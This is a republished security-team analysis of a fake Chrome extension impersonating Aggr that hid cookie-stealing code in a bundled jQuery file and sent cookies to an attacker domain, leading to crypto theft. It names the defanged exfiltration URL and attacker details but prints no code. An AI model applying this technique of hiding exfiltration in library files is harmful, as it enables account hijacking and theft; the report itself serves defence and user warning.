Popular Science | Analysis of Fake Chrome Extension Theft

Original title: "A wolf in sheep's clothing | Analysis of fake Chrome extension theft"

Original author: Shan, Thinking, SlowMist Security Team

Background

On March 1, 2024, according to feedback from Twitter user @doomxbt, there was an abnormality in his Binance account and funds were suspected of being stolen:

(https://x.com/doomxbt/status/1763237654965920175)

At first, this incident did not attract much attention, but on May 28, 2024, Twitter user @Tree_of_Alpha analyzed and found that the victim @doomxbt was suspected of installing a Chrome There are many good reviews of the malicious Aggr extension in the store! It can steal all cookies on the websites visited by users, and someone paid some influential people to promote it 2 months ago.

(https://x.com/Tree_of_Alpha/status/1795403185349099740)

In the past two days, the attention of this incident has increased. The credentials of the victims after logging in were stolen, and then the hackers stole the victims' cryptocurrency assets through counter-trading. Many users consulted the SlowMist security team about this issue. Next, we will analyze the attack in detail and sound the alarm for the crypto community.

Analysis

First, we have to find this malicious extension. Although Google has already removed the malicious extension, we can see some historical data through snapshot information.

After downloading and analyzing, the JS files in the directory are background.js, content.js, jquery-3.6.0.min.js, jquery-3.5.1.min.js.

During the static analysis, we found that background.js and content.js did not have too much complex code, nor did they have any obvious suspicious code logic. However, we found a link to a site in background.js, and the data obtained by the plug-in was sent to https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

By analyzing the manifest.json file, we can see that background uses /jquery/jquery-3.6.0.min.js and content uses /jquery/jquery-3.5.1.min.js, so we focus on analyzing these two jquery files:

We found suspicious malicious code in jquery/jquery-3.6.0.min.js, which processes the cookies in the browser through JSON and sends them to site: https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

After static analysis, in order to more accurately analyze the behavior of the malicious extension sending data, we began to install and debug the extension. (Note: The analysis should be conducted in a brand new test environment, where no account is logged in, and the malicious site should be changed to a self-controllable one to avoid sending sensitive data to the attacker's server during the test)

After installing the malicious extension in the test environment, open any website, such as google.com, and then observe the network requests in the background of the malicious extension. It is found that Google's cookies data is sent to an external server:

We also see the cookies data sent by the malicious extension on the Weblog service:

At this point, if the attacker obtains user authentication, credentials and other information, and uses the browser extension to hijack cookies, he can conduct a knock-on attack on some trading websites and steal the user's encrypted assets.

Let’s analyze the malicious link https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.

Domain name involved: aggrtrade-extension[.]com

Analysis of the domain name information in the above picture:

.ru It looks like a typical Russian-speaking user, so it is likely to be a Russian or Eastern European hacker group.

Attack timeline:

Analyzing the malicious website aggrtrade-extension[.]com that impersonates AGGR (aggr.trade), we found that the hacker started planning the attack 3 years ago:

4 months ago, the hacker deployed the attack:

According to the InMist Threat Intelligence Cooperation Network, we found that the hacker’s IP is located in Moscow, using a VPS provided by srvape.com, and the email address is aggrdev@gmail.com.

After the deployment was successful, the hacker began to promote it on Twitter, waiting for the fish to take the bait. Everyone knows the story behind it. Some users installed the malicious extension and then had their money stolen.

The following picture is the official reminder of AggrTrade:

Summary

The SlowMist Security Team reminds users that the risk of browser extensions is almost as great as running executable files directly, so be sure to review them carefully before installation. At the same time, be careful of those who send you private messages. Now hackers and scammers like to impersonate legitimate and well-known projects, and defraud content creators in the name of funding, promotion, etc. Finally, when walking in the dark forest of blockchain, always remain skeptical and make sure that what you install is safe and does not give hackers an opportunity to take advantage.

Original link

欢迎加入律动 BlockBeats 官方社群：

Telegram 订阅群： https://t.me/theblockbeats

Telegram 交流群： https://t.me/BlockBeats_App

Twitter 官方账号： https://twitter.com/BlockBeatsAsia